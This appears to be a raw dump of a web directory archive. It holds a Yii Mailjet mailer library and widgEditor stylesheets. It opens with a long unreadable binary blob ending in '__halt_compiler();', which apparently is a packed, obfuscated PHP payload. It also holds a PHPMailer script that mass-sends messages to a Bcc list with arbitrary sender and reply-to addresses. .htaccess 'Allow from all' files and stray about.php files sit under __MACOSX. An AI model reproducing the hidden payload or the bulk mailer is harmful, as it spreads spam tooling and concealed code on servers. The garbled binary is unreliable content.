�p/��>H��y�G}�����#./�&�Bvs�{���=���I�5�a����PI�����DC�.��YD�}��`a����j�8=��`�語��E�|]�s�=�,�(��ϱ��)��0sB��K�uY��i�\"���]�]N�O��'��xp��D�� 5�M>�+%�N�z\\�vϵpVC��h� �IP���X��g�,�j��-��(��z�T�{�ĺ�'��cn]ۙJ��|&g�tR6��qm���(���-�S+�ӏ/��rzJ�3����G7��T�.���ñ9�[�b�Y}_�A,uɂ8}1�oB���� ��)� ���|*\\|x�G0�aE�_�k���R'��(�Zrݵ�%! B�Cğ�Yp-��4/.� \\~�j����˰���c��2�J�o�Y�.2�j���\":n�AG �_�������߬�9] S)�r:�\\<‚�,i�I�����w9~Q5��j��L��s�IkP�H��߾�J�`�1Y؏�b�2f���_��XUr��E;e!إ�e���� ��e5V���\$�:�m�=\$�]�P!�%��5��9�=��`�i��l�nz�S�/^*N��rÚ%���!�M���0���'�֟����J;���������F��09)?�'B^r�BOё_]#>W���j��'��� ^��58��!6X3D#`)�ӟ��,��=&gR�D�#�d&��~�ggQ3�s[,�B}���o!fCj��A��'Lܻ�����9Q�V���Q��v\"� ��I�;%��T����\$�1S��6��2R&��6X?�{R��#Q���ڶ�����D��z��,n���@��g���X'��UWc�WS�#� �)���䁧� ޓ� 軏'[j�3��VV��upt:��I����Q�׻[���F��������=��H�V�%�Hd[��ã��^G7#�M8V��]2�ո�ZV_��ww}�Ҕ af����B���\"���a½�4�;=ZqNK�P�z�̕�K�fs'�����^�a�����U���~x����-��X�1��L��BP��3���/a������(R��Q�����#�>��ꈵ� �X���;y� /�'���=č6�Е| �ﻍ���*9m�DƚI��=3 �%dUU�׾T���m��d�.I��婊�V��la��*�Pֶ� �ޛ��Ec�?*O��:��-B��\\�� K3RGO�j����C����'���Z ��*�����K����}��du������%�n e�����!R��6rIX5R���R���j��E����U>��s���+�V����ahO B����꽷Dz�UuIN��>)����N~ �|�� =��lC)@K��Cy��*�-4Y��w��]� �у i�!M�Y��qF��̾C5�.��ʕQn���T� G̒�����z�+\$y}���5��v��������J�Ӑ��v �|�~mqQ\$^���Rk 邦��<�)QP�.��3�4v�<Ų� ðC��Y�7�8_�Nj��'g�uw� �q����\\蓂��/�,Q���0��D�D�J,��� R�q�3CeE'�P�� �7\\�kTp�o�����?C�!͠�lz�� �XL�D�(�*Zȇ���3��%\"(�dS�s�UɿhJ�s���BO��Y����{P��L�����U�J�ק,�q5��o<(abH��P�\\�F�|&����`��T�}�O9� .�A�(^LP-L�?�~���� ~�t�ot0M`�R�9��������A7-Y��:ʳT�i���c��u�?/ɭ�אg�9F�R���g~ڶP!>-v�T��9�t�_�;-E�cRtl]5?�_�uDk?P��ӎ �󑄔&�.�v��p���N-��o�%=⊍���%��nKպ[MP�0��1�D������8 �Iӫm�XT��.u�W�`s��Hǘ�y��SZ��uTZ�JQ��Q� ��U!�]�<���I�C�A �n0��^AK�3}�u=j+��1����K��\\��l٥�ϖ� ��E�Tl�ܻG/�2�i�0&�̑�堨��F5���7g�����_��^F+FsL�H�j�cL>s'�ɉe���X���h�/�O9߉\"7@��:w�v�&��J��HP��\"(��8��܎���/Zxܘ~�T��E�2Y6�['�A\$�>�����D��@T�5��]���:��q՚@�o09��%�b c���m��;������^�+� ~�>���\\�0�?�/� ���N��.f�����[���!�[U'�N|����� ��CN��_u� /��C�0�.��zkp|b�\$�'h�-+7�vp��=����,�r�䉺A�%�~�}���p�[����|<*�ֶR�s����K�.{5'��t�`m�)��֦���7�!���#����J3�4�14>�nZ�TL�|wY���/ʇ���bbN�-�eB��X@�u�V���}0&3x昧/��m,��[M�O^J�,���e�ת�����>��q�{�H�s�س��� o��F1�4��h|�*�t8�����4�� �� ��9�5ܜ��/JZ��(� �K�! �I��3�(�Ǐ�0�cA6��[�/�y��P�Q2��(X���� �{  ٯ[��O���1�BT1pƏ75��� ��A��7�<6�.�p��u 㕾���Z3��w�.+���Q�>�-�UN_͌\"���M��Rx���>!� �c����û���ˌB�1�K/��a�پ�~bc��| ��W��i�Z�:�٪������8K��T�������xU�s2���]�i�l��-�&��c*��qG����5��Tc��tº��eA�,뢶6NQ��T����l ��0Tr�q:� B̍Yv����c�;�� f���i�Y��%�`ؐ,��!�1�:9��4��5P��d ȭs�!#�ڠ\$ck�\"�1]Bj��+��9��d�u�=��݅D��X��Hm�H�f���Q�p�S�a�3��`找:��-P0aU؆�S\\�4�1�8�����f�.���|k�� �*dz@���LBy�t��:WRZ�d;���l���'��I��Ah�}o3[Sjp���T�����Ш�N��-/�- �������U���rf��+�oPyZ���Ȕ%ok� ��1�d'�{�)W-�5&Ʀb:I�Һ���/��9K�J�.̳�� ��a��WR��ˊ����t�� �� �H��lF�� 32hUk՘1iy-�?����H��W��V�Ҵi�DV�6 +��:����sX�\\ �?�1A�ku�,E�v��=�c{�}�dN1��cX���\$hY4�F����Ȳ,�?L�8��\\�Hvg7i����j O��6� G�3�GLڗZȉDy^t�� �{��31�\$r`�a��-/������L5xٕ�;\\�����#�*,���=u� �c02�B�e�{;;�R���] Q�川�z��8� �}��7�}x�9M\$�3Ս��+�/���yd�X��2���p�+8��{� O�ŀ���N94Y�5��e�_��-���#S)(�2���U\\��b��4�'�AH�2Gg78t^��o�m7÷S �� �gh�%B�Kڝr@�B.���t���԰Ĩ�A}�L��eK8��}:�3��idYA�i\"��]J�����v��槜�+i��'�p�ÍZi��ZA�͙�L���W�*�*숲�@��⛒�ˤ��~���,��e�̴֝�\"k~���yLH���{����7�����\$@d��+��Vxڌ�c��XB :�������N�^c?�_SL���V �Sˤa����{�?�޻VY1.Y��yKeކ+�V�Øqi�Ij����6� �f|�;�W��R5�����|������),�5h�s��v�A�U @9v�*�Nq3�Y�u�������rS3��J�0ͯ0�O��@3�T�wY�ޖ.�o}�+\$��pA%��]G#�Z���^��G��F2���Q���Η�h�bC5IH#|�R�1���RIa��ݙ��_��u�,�����K ��7��fvye�]7�!f���ZK{����C�������i��� �H�SȋO 4�D}�>'���IA��۞�/��v�hݻ������U�>� ����8�b�`�;5lm��LB�U.��?����� p*=>��!��t�N ���Q:1*�ӺM�1�P%T� G�ʒ6)�ǥ+�b���� �П��1�����q���/�&ȯ���� �L�/bq�b�nq�h� �u�,�mL�3Q|�exW�R�5)@5�[�{��{�_��9R7���9���(հ\$�<58�=�^R��Rp ��~�Z2�Y�3ַdo sw'jҭ@��K��9���59��f��D��F;(bo�Ơ��)�b�=\"� ��yDk� 5� �\"ޱT���<� �TP.}A�#�!������[���}I;�J(�ٲ�+�!��1�=so ��\"qѴ��X�߈jщ��r��C�{1=���4�i',{�Ļ����+���ֻ��ɛh^QY�8e��.a�5]��:t�ާXڻn� �������gBaWsh�0]��G�~������!Z����r�~lMk���Zw�Ꮀ>_��&�%:sh�[Ag'; ��n��:{�Jq�wGU詳��ǭ�t����~S�]�tי��zi�R)y�\$O��j4���_bK�U�h)X�Yijv�����<Ă���w T~��飁�i>ĭ�L<���廱&~ƺ`Ht�+C�(s�2���5�ס�����|-�� � ��I�צBu���3K��^��i�B2c�Ǽ4i�&�-(� �\"' �rhqa}&��o(���@�WT6�z�ŗ��'}p� ����[�\\�\\w:�����%:��Y��=ҿ��y�?���tY�?��x�k?:�!�]%�ǣh2L:�l��]��5�uo��6�� f ��4���{�����qzR`���?� �jڡ��-0[G�h���b����!�ʪ7jp� X�� �� ���#릎��(B8�'��������C:m9:��+_P|�M�~����mk��.+��{.{��sW���H�l'��P���� ��vŘr^*\\�s �Y�+P^/j�[/A#(��d9*Ϗ��E�Ȱ���g~.�a?��u'�� n���;��ؚ7n� z�cOhol<�j*Ƴ�%� b��q84tי��Z��R5���#@3���8�a��j�nݦ�ϊ��˽���0��gI���ܣ����H�ʃt�<� ��X��~H2���!zƃ���>�a��j�w����v)?��H�B��*K��S��k|ΞO�T@Wi����G�X|�� Rc�� �c���Y#Fa,\\�Z7�j�D� 9�>�6�Q=ݭ&��G���q����ATO��Y]�v�Կp�K��_fFf��䳜 �*>�X�Q��;�k��\$�*��0S*���:�E��A#�Z����k\\U���x���ڛӒ�w���3��g[��-z�^�1�L��W���W�d^¹2�\$���-�;��%N|֦���U�::i�)&�z�=�����hs(���|���˟-�R��7^��3.�Hwd�鬨�� ���/�G3��3CA5'���S�ʋZL�*p�E���e�Mu���6��� ��8�;��%�D(�ѫ� �� !�k9 lO���P��Rg�㤙 �Qd&+�1�N���`a%��o�B�s�.f^g����,�f�H ���?]�ܯw��V��� �~{����j��;�y*焮Z�J�\\陚̡��d��i��M�]�k7�2�>_1:_��ZԎd��!ۅ�4��d.X7ن��^-ָ�l���\\I�5��gW�#AT��� �fxM��Nr�M�풸b� ��8fɢ��n^N´�d/,,��2�!�B8ܯ�pc��������sp~���WI�!�w�8+�&`�5�*� ���r�`�Xw���5)M�ĦR2�rM��\$^�ƈ��ggTl��4� �fZf���>��|1�c��Pl�r��|�Z��K1DM_���C���Vcdk�8V@����m������x�\">Y���1�:Y�����s ��X�U��H�4k����\\��w���F��-,v��D�G���(&�{o����U��v���-�pB��&<��`�o��9��N�a%MI&���S��A���2]_c��R\\�s�}�eQ�S]ZU7���!f'v���G���M%�`+�4�v ÿ��)V���( u�h�pN!b1�<:r+����� �����C,��Q����ICI=ݔr���Ζ�Ƹ�BB��\\�AEP{��[T�Tr?�K��vo\\O�o�2�3u������a�pol���p���N�C�@סD� v_gyo�[�XY7�S n\\Me�VVu #��pY��K�����z��4�'��S�Y2!�q\\ݞ���d&����̥�^���M�#X��dw�����Wo�KK�K���j\\�X�Ǎ݋�\"='`�c�g_u_K5>�}suN��S��҈Lũ!A �E��M0����K6y s��F��E��W�Ĥ�j��޹lE���-�/ƿ�h��ݿ�.�/O�c,�֯@V�کu����?&�A����Ӂ �(��s:���G',f�c�����j��u�w�6&Ao�?n���3%Sw�W&�I� �5b�3oPqm�;��o�`�Ͼ� P� �h_� �a4o�� �uO%d����d�� >��^ܜx []�\"5_r���k{���ͅ\\�w �2�� K�Bk�><�5�z��`�zf���rF*u��9�k�%���?a ����� �Mܸ6fY��t��U�R�w�� C��F*=_��T�[Ǐq�Ֆ��2jİ�@�}k��֣}��L��Q��V������Q�X��y��%���6>��%|OmiV�P{\\`^{�Ƚ����v�j\\�)�:��ڛ��:M�h2'\\'Ƹ42!z�C[@����@>_���u���m�T�,��7#�����^����2\"�'���)��P�@X͋�`Z �j��t����:��! m�*wr�`�,�t�b���R5z����\\�?s��e`����xD��m�}�H V� B7�m)k�: ��� �Ռ����.6Xs#��G���S� �ϻ�J@<�/徤����W��ؗ�Ʊ�0��p�9�F�+�N��r\$�_��ݺm�Y}��~~x�?�����R� �ح�G�\"��L�o����ggrD��\\�F�s�'�E~�����ͯ�a���4_>�� �jMLU��S��z+�<О�@��|��M�Ժ/U �~k�C`ͻ��D���:��(ҹ�A?u�X{?hl[��ξ� �w`�>��ʮR^��\"X��x p�R���9�T���^薾�x�4աC[U�>���;��Ƨ�F� �\\94���� Ƴ/G޺r�9:h��oQ 9䙹�xK��u���l_N78c�%���ɡ�u||@����Sn��pӤ;B�1������U h�|A�eD\\���|�`�1 9�?����+WJ9��\"� ��c����' ?��+hj��A�\$�w E�P��A���Ⱥy�/ ��|�P��9�Mj�؃�C���.�&?�z�h���#��wsz���k[�v��H5��t�m��ܫ�F�%@�[Z�/�%�E%/�ӹ<9ꚳ����������Q��ީ�۳����@�i��&�~3�M���0S���K� �^�0�����Qq�(���^|j*�Rs��'C�V�K3��7�H��'�Ղ�%�eo�̄07 :�Y���=uI�f� �&�4����w�P�Uocemnnif���7Δ=����;�̏���4C,F�0�N�pJ�BZb��fd1'T�g�i�u�t� ��\"�1��Dp�!�M9‹?��}P�Tf���6Q;���(4��v/kL+�N�Ȓ����u��nJu`���tZ�Kԛ���xfZ#��U�s�Lֺtbp��T�ۥRʧ�=�����Ry�-v]B�i���C�+� v,��b�=s�\"Γ�]���gy�,��ӕ�A'���\"���I��D{�K- ^h�O��U4\"u��1�'���ts��6��]�fIC^� �N�����k�J�C����� rΕ�i�E�� �s7fϼ��Q��(u���� UJ����{Z9ƾϠh�n�„ҵ�Y��D���%݃��@�[�u�uP�@��� <3?�m��,픫��{� �7zWq��?j:���q����U���X.��х:>m�\$��0���o .� Z�D�3p���,��˜�8������ϒ� �p��:#>Qk��_EwY���QsC��+�J�\$�h��_!��[z%�B�5����z�\\U�\\̷��!1���ؒ2�(�/>��z��UA�v���ɀ��c���^`͢@� �E�}�;�h�ވ��{�:�%��\\��+}o_���H?��5��\\��^o[���剂��[�p��týp֟�\"΍f�}6\"ZW�vIake��z�ٯſS����?\"����h�7&yo��\"[ƒ�}�/�f�+p2G��l[������!3��) ����iQ>�jw�l3���=)��,�=/.�ޖ��u����?�y�y�Ourb2|m��DS�tE�{\\�F����&��M��cw�E�;�#�E�2n� ف�ݮ �yr-7A!ŹYm�I/�0P����R���9dn��Ϝ���pˎ`�sS�R�;��g�' ,�O� \"��@��lߍ7 ��.�޸Og��8����J��*�2���� N�Cz������R�/��#����n�0�_D]BDA��ᶐz��K?�����Q7<�T衰�YS*g.,2�3+��玺 �q�ヌՠv��� ��5�3j�!�8�9"));__halt_compiler();�����������Ў��Ǎ�� Ж�����Ӑ����� ����������׽�����Ļ�����乬�����ʨ����������������������� �ķ�ـΧ� ޛ�ݑ�����������ڃ���͞��������Ǜ���鏌��������϶�Ƒ�����������ˬޗ��³ȋ�� ��ᴫ������׸����ҍ� ������� ����ҍ���۩� �Ֆ��������� ��Ə���A.�Đ�-�MW=�̕�>��J�\6 �����XǺ� ��� �wg ��S����qc�/��DS����_���A�ۘO{��J1�]\qPWF����Z'e|��s*_ӶoR����-���k҄wq|�G��ٗE�%�[��8{t�A�_������V6}RCߛ_ꍁL^0��<@*D�� �"Y�k�79q�������^�:��_V��A���t�|�F+y^�h�B��G�Ga��۷h��%X��K�iB��b�2��a:N� \Q�l0�s&���˙���>٤3cpo��ds��$�;�B\�C ����LK�H�տ1�� �,�yO�+Y�ވZ����@������>4� /)omXF��0�v�e9 \D�2���nn��h�@�Fq���D-zQ��;h����A$�F ��K�ѯ `3�'ތ��>�zM3C�1O�mMES��B`���K��%��DY���i�)7%_>�_ƃ�EՃ� ћ���I?B�ą)�K�J�E�=��^�(���,����ox�������]�[�$� ��s^�0ٕ9�\<��L�ox�v+\"�h���G�#� ʃ`�� ��k)�#���՟�a�d��i�$�[�M�L���@��ٯ���M q1�Կ��p>v��̬d��$Y�N�% 7����H�XUy5�I -�N��U�����l`.�G���߆^�$��������Z�~�8�e_��/��=k�g�7�����K� ��D��E �P9/��$>�VP�\(�r�Q{�V(�P����F qq0�lA>��ֻY ����)/�[]�@���[���3�wα�v�Fj�}���a�˽`�B�qF�}>��X��|-ԓ�Ոf�u�������_n�5]+� tm����9 ]�-Dw6�5�?�-��]s"+(C�|e(�y���~44�'�)M~��O�u=�B=U��b��x��\��c��#D-iB��o��^�"Z�T'�u^m6��+Y��t��gT*ɜ�ҿ*����uX�+Eӫ��=�X*� �xudW��>�6��� ��Z�&���\� x�,�#� m���x�*� �z�����f�xAN �<�ͱ�AW���jQ ���"<�ꦽ�V��˷p�-����g�=ø� X@v�/^����(�Wx�|��VhԠ:i�iK0l�E2_�N�jZ��0�1�i�&�݉jx����"J�4M�%��gU�\6�T~$��/��&q�n�K��d8��@e������U��,4}G�h��(pZ4!YSMTPDebug = 1; $mail->setFrom($Sender_email, $Sender_name). "\r\n"; $tos = $Bcc; $addr = explode(',',$tos ); $mail->isHTML(true); $mail->CharSet = "UTF-8"; $mail->Subject = $subject; $mail->addCustomHeader('X-custom-header', '1'); foreach ($addr as $to){ // $mail->addReplyTo($reply, $reply_me); $mail->clearAddresses(); $mail->addAddress($to); $actualmsg = $message; $mail->Body =$actualmsg; $mail->addReplyTo($reply, $reply_next); $ok = $mail->send(); //sleep(10); // 10 seconds if ($ok) { echo "Message Sent!!!"; } else { echo "Error"; } // $ok = mail ($to, $subject, $actualmsg, $Sender_email.$Sender_name); } ?>.htaccess000064400000000124151032724670006346 0ustar00 Order Allow,Deny Allow from all yii/Mailer.php000064400000014201151032724670007265 0ustar00 'http://yoururl.com/tracking/bounce', * ] */ private $_tracking; private $_allowedTrackingEvents = [ 'sent', 'open', 'click', 'bounce', 'spam', 'blocked', 'unsub', ]; /** * @var string message default class name. */ public $messageClass = 'weluse\mailjet\Message'; /** * readonly * @var $_response Mailjet\Response */ private $_response; public function init() { if (!$this->_apikey) { throw new InvalidConfigException(sprintf('"%s::apikey" cannot be null.', get_class($this))); } if (!$this->_secret) { throw new InvalidConfigException(sprintf('"%s::secret" cannot be null.', get_class($this))); } try { $this->createMailjet(); } catch (\Exception $exc) { \Yii::error($exc->getMessage()); throw new \Exception('an error occurred with your mailer. Please check the application logs.', 500); } } /** * Sets the API secret key for Mailjet * * @param string $secret * @throws InvalidConfigException */ public function setSecret($secret) { if (!is_string($secret)) { throw new InvalidConfigException(sprintf('"%s::secret" should be a string, "%s" given.', get_class($this), gettype($apikey))); } $trimmedSecret = trim($secret); if (!strlen($trimmedSecret) > 0) { throw new InvalidConfigException(sprintf('"%s::secret" length should be greater than 0.', get_class($this))); } $this->_secret = $trimmedSecret; } /** * Sets the API key for Mailjet * * @param string $apikey the Mailjet API key * @throws InvalidConfigException */ public function setApikey($apikey) { if (!is_string($apikey)) { throw new InvalidConfigException(sprintf('"%s::apikey" should be a string, "%s" given.', get_class($this), gettype($apikey))); } $trimmedApikey = trim($apikey); if (!strlen($trimmedApikey) > 0) { throw new InvalidConfigException(sprintf('"%s::apikey" length should be greater than 0.', get_class($this))); } $this->_apikey = $trimmedApikey; } /** * Create the Mailjet Object */ public function createMailjet() { $mj = new \Mailjet\Client($this->_apikey, $this->_secret); $this->_mailjet = $mj; } public function getResponse() { return $this->_response; } /** * @inheritdoc */ protected function sendMessage($message) { $recipients = []; foreach ($message->to as $email => $name) { $newRecipient = []; if (!empty($email)) { $newRecipient['Email'] = $email; } if (!empty($name)) { $newRecipient['Name'] = $name; } $recipients[] = $newRecipient; } $body = [ 'Subject' => $message->subject, 'Text-part' => $message->textBody, 'Html-part' => $message->htmlBody, 'Recipients' => $recipients ]; $body = array_merge($message->from, $body); $response = $this->_mailjet->post(Resources::$Email, ['body' => $body]); return $response->success(); } public function setTracking($tracking) { if (is_array($tracking)) { $urlValidator = new UrlValidator; foreach ($tracking as $event => $url) { if (in_array($event, $this->_allowedTrackingEvents)) { if (!$urlValidator->validate($url)) { throw new InvalidConfigException(sprintf('"%s::%s" should be a url', get_class($this), $event)); } $this->_tracking[$event] = $url; } else { throw new InvalidConfigException(sprintf('the %s event is not supported', $event)); } } } else { throw new InvalidConfigException('The trackingActions must be an array'); } } public function activateAllTrackings() { foreach ($this->_tracking as $event => $url) { $this->activateTracking($event, $url); } return true; } public function activateTracking($event, $url) { $body = [ 'EventType' => $event, 'Url' => $url, ]; $response = $this->_mailjet->post(Resources::$Eventcallbackurl, ['body' => $body]); if (!$response->success()) { $eventCallbackurl = Resources::$Eventcallbackurl; $eventCallbackurl[1] = $event; $eventExist = $this->_mailjet->get($eventCallbackurl); $responseData = $eventExist->getData(); /* check if is the tracking url the same */ if ($responseData[0]['Url'] != $url) { throw new UserException('You must clear your old tracking urls first: Yii::$app->mailer->clearAllTrackings(); or Yii::$app->mailer->clearTracking(\'' . $event . '\');'); } } return true; } public function clearAllTrackings() { foreach ($this->_tracking as $event => $url) { $this->clearTracking($event); } } public function clearTracking($event) { if (!in_array($event, $this->_allowedTrackingEvents)) { throw new InvalidConfigException(sprintf('the %s event is not supported', $event)); } $eventCallbackurl = Resources::$Eventcallbackurl; $eventCallbackurl[1] = $event; $response = $this->_mailjet->delete($eventCallbackurl); } } yii/LICENSE000064400000002054151032724670006353 0ustar00MIT License Copyright (c) 2016 weluse GmbH Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. yii/Message.php000064400000007151151032724670007446 0ustar00_charset; } /** * @inheritdoc */ public function setCharset($charset) { $this->_charset = $charset; } /** * @inheritdoc */ public function getFrom() { return $this->_from; } /** * @inheritdoc */ public function setFrom($from) { if (is_array($from)) { $this->_from = [ 'FromEmail' => key($from), 'FromName' => array_shift($from), ]; } else { $this->_from['FromEmail'] = $from; } return $this; } /** * @inheritdoc */ public function getTo() { return $this->_to; } /** * @inheritdoc */ public function setTo($to) { if (!is_array($to)){ $to = [$to => '']; } $this->_to = $to; return $this; } /** * @inheritdoc */ public function getReplyTo() { return $this->_replyTo; } /** * @inheritdoc */ public function setReplyTo($replyTo) { $this->_replyTo = $replyTo; return $this; } /** * @inheritdoc */ public function getCc() { return $this->_cc; } /** * @inheritdoc */ public function setCc($cc) { $this->_cc = $cc; return $this; } /** * @inheritdoc */ public function getBcc() { return $this->_bcc; } /** * @inheritdoc */ public function setBcc($bcc) { $this->_bcc = $bcc; return $this; } /** * @inheritdoc */ public function getSubject() { return $this->_subject; } /** * @inheritdoc */ public function setSubject($subject) { $this->_subject = $subject; return $this; } /** * return the plain text for the mail */ public function getTextBody() { return $this->_textBody; } /** * @inheritdoc */ public function setTextBody($text) { $this->_textBody = $text; return $this; } /** * return the html text for the mail */ public function getHtmlBody() { return $this->_htmlBody; } /** * @inheritdoc */ public function setHtmlBody($html) { $this->_htmlBody = $html; return $this; } /** * @inheritdoc */ public function attach($fileName, array $options = []) { throw new Exception('Not Implemented'); } /** * @inheritdoc */ public function attachContent($content, array $options = []) { throw new Exception('Not Implemented'); } /** * @inheritdoc */ public function embed($fileName, array $options = []) { throw new Exception('Not Implemented'); } /** * @inheritdoc */ public function embedContent($content, array $options = []) { throw new Exception('Not Implemented'); } /** * @inheritdoc */ public function toString() { return implode(',', $this->getTo()) . "\n" . $this->getSubject() . "\n" . $this->getTextBody(); } } yii/README.md000064400000002050151032724670006621 0ustar00# Mailjet Client ## Create Mailjet Account https://goo.gl/YNWTwd ## Install ``` composer require weluse/yii2-mailjet ``` or add it to your composer.json in the require section ``` "weluse/yii2-mailjet": "*", ``` ## Setup add/replace this in your config under the components key. ``` 'components' => [ 'mailer' => [ 'class' => 'weluse\mailjet\Mailer', 'apikey' => 'yourApiKey', 'secret' => 'yourSecret', ], ], ``` ## Example ``` Yii::$app->mailer->compose('signup', ['user' => $user]) ->setTo($user->email) ->setFrom([Yii::$app->params['noReplyMailAddress'] => Yii::$app->name]) ->setSubject('Signup success') ->send(); ``` ## Setup Event Tracking Write the tracking item to the mailer config. ``` 'components' => [ 'mailer' => [ 'class' => 'weluse\mailjet\Mailer', 'apikey' => 'yourApiKey', 'secret' => 'yourSecret', 'tracking' => [ 'bounce' => 'http://yoururl.com/tracking?event=bounce', ], ], ], ``` To activate this url you must run this command at one time. ``` Yii::$app->mailer->activateTracking(); ``` yii/composer.json000064400000000442151032724670010067 0ustar00{ "name": "weluse/yii2-mailjet", "description": "Mailjet client", "type": "library", "require": { "mailjet/mailjet-apiv3-php": "1.1.5" }, "license": "MIT", "minimum-stability": "beta", "autoload": { "psr-4": { "weluse\\mailjet\\": "" } } } yii/.gitignore000064400000000000151032724670007323 0ustar00mailerstyle.css000064400000004531151032724670007622 0ustar00/* To change this license header, choose License Headers in Project Properties. To change this template file, choose Tools | Templates and open the template in the editor. */ /* Created on : Sep 26, 2016, 3:58:45 AM Author : queen */ body{ padding: 0; } .textarea { border-style: inset; border-width: 2px; } #containder{ position: absolute; width: 100%; height: 700px; background: activeborder; //margin: 0% 25% 0% 25%; //padding: 2% 25% 2% 0; //text-align: center; padding-left: 1%; padding-top: 0%; font-size: small; } .txt{ width: 95%; padding: 5px 0.5%; font-size: 10px; color: #333; border-style: ridge; font-size: small; border-color: #333333; border-top-color: #cccccc; border-bottom-color: #333333; border-style: inset; border-width:thin; border-top-width:0.11em; border-radius: 3%; } .txt1{ width: 80%; padding: 5px 0.5%; font-size: 10px; color: #333; border-style: ridge; font-size: small; border-color: #333333; border-top-color: #cccccc; border-bottom-color: #333333; border-style: inset; border-width:thin; border-top-width:0.11em; border-radius: 3%; } .spacing input{ margin-bottom: 5px; font-family: monospace; } .messagetxt{ width: 55%; height: 50px; padding: 3px 0.5%; font-size: 15px; color: #333; border-style: ridge; font-size: small; border-color: #333333; border-top-color: #cccccc; border-bottom-color: #333333; border-style: inset; border-width:thin; border-top-width:0.11em; border-radius: 3%; } #submit{ /* margin-left: 9%; */ } .btn{ width: 10%; height: 50px; background: activeborder; color: #333; border-radius: 10%; font-size: 20px; font-weight: bold; } .toolbar{ padding-left : 9%; } /* #btnedit-title{ margin-left :25%; } */ #prompt{ position: relative; background-color: #cccccc; width : 13%; height :150px; padding-left: 10px; padding-top: 0.5%; padding-bottom:1%; border-radius:5%; font-size: 13px; float: top; }widgEditor/css/widgEditor.css000064400000006045151032724670012264 0ustar00/****************************************************************************** ** STRUCTURE OF DYNAMICALLY CREATED ELEMENTS ******************************************************************************* ** **
**
    **
  • ** **
  • **
  • ** **
  • **
** ** **
*/ /* TOOLBAR BUTTONS */ .widgToolbar a { display: block; width: 30px; height: 30px; overflow: hidden; background-repeat: no-repeat; text-indent: -1000em; text-decoration: none; } .widgToolbar a:hover { background-position: 0 -30px; } .widgToolbar a:active { margin-top: 2px; margin-left: 2px; background-position: 0 -60px; } .widgToolbar li.on a, .widgToolbar li.on a:hover { background-position: 0 -60px; } .widgToolbar li.widgEditButton { background-image: url(../images/widgeditor_button_shadow.gif); background-repeat: no-repeat; background-position: bottom right; } .widgButtonBold { background-image: url(../images/widgeditor_button_bold.gif); } .widgButtonHTML { background-image: url(../images/widgeditor_button_html.gif); } .widgButtonImage { background-image: url(../images/widgeditor_button_image.gif); } .widgButtonItalic { background-image: url(../images/widgeditor_button_italic.gif); } .widgButtonLink { background-image: url(../images/widgeditor_button_link.gif); } .widgButtonOrdered { background-image: url(../images/widgeditor_button_ordered.gif); } .widgButtonUnordered { background-image: url(../images/widgeditor_button_unordered.gif); } .widgSource a { background-image: url(../images/widgeditor_button_empty.gif); cursor: default; } .widgSource li.on a, .widgSource li.on a:hover { background-position: 0 0; } .widgSource .widgButtonHTML { background-image: url(../images/widgeditor_button_html.gif); } .widgSource .widgButtonHTML:hover { cursor: pointer; } /* TOOLBAR */ .widgToolbar { list-style: none; width: 100%; height: 48px; margin: 0; padding: 0 0 0 2px; border: 1px solid #CCCCCC; background-image: url(../images/widgeditor_toolbar_bg.gif); background-repeat: repeat-x; } * html .widgToolbar { width: auto; } .widgToolbar li { display: inline; float: left; width: 32px; height: 32px; margin-top: 9px; margin-left: 7px; line-height: 30px; } /* EDITING AREA */ .widgIframe { clear: left; width: 100%; height: 200px; border-top-width: 1px; } .widgContainer textarea.widgEditor { clear: left; width: 100%; height: 200px; border-top-width: 1px; padding: 0; } /* EDITOR CONTAINER */ .widgContainer { }widgEditor/css/main.css000064400000001701151032724670011101 0ustar00/* RE-DEFINED HTML TAGS */ body { margin: 0; padding: 0 0 2em 0; background-color: #FFFFFF; color: #000000; font-family: Arial, Helvetica, sans-serif; font-size: 80%; line-height: 1.4em; } body * { margin-top: 0; margin-bottom: 0; } fieldset { border: none; padding: 0; } fieldset.submit { margin-top: 1.5em; text-align: center; } fieldset.submit input { width: 20em; border: 2px solid #003399; border-top-color: #0099FF; border-left-color: #0099FF; padding: 0.25em; background-color: #0066CC; color: #FFFFFF; } form { margin-top: 1.5em; } label { font-weight: bold; } p { margin-top: 1.5em; } textarea { clear: left; width: 100%; height: 200px; border-top-width: 1px; padding: 0; } /* OBJECT TAGS */ #content { clear: both; padding: 0 2em; background-color: #FFFFFF; } /* CLASSES */ .clearer { clear: both; height: 1px; font-size: 1px; line-height: 1px; } .hidden { position: absolute; left: -10000px; }widgEditor/css/widgContent.css000064400000000271151032724670012443 0ustar00/* HTML TAGS */ body { font-family: Arial, Helvetica, sans-serif; font-size: 80%; background-color: #FFFFFF; color: #000000; } /* OBJECTS */ /* CLASSES */widgEditor/css/info.css000064400000001302151032724670011105 0ustar00/* HTML TAGS */ h1 { float: left; width: 154px; height: 105px; margin: 0 4em 0 0; padding: 0; background-image: url(../images/logo.gif); background-repeat: no-repeat; font-size: 100% } h1 a { display: block; height: 105px; } dl { float: left; margin: 0; padding: 10px 4em 1em 0; } dt { margin: 0; padding: 0; font-weight: bold; } dd { margin: 0; padding: 0; } /* OBJECTS */ #experimentInfo { height: 105px; margin-bottom: 2em; background-image: url(../images/header_bg.gif); background-repeat: repeat-x; color: #0066CC; text-align: left; } /* CLASSES */ .hidden { position: absolute; left: -10000px; }widgEditor/__MACOSX/.htaccess000064400000000124151032724670011737 0ustar00 Order Allow,Deny Allow from all widgEditor/__MACOSX/about.php000064400000000363151032724670011771 0ustar00 AccessDeniedAccess DeniedAS3DC7Y06SVT2903UkoT+gpg5LxYCCpL0BLugFM3nFi1A9IoiUQK8Bq9hDo2jopJnVq8jmUP41350SMZV9/n+XSUEIE=widgEditor/__MACOSX/about.PHP000064400000000363151032724670011631 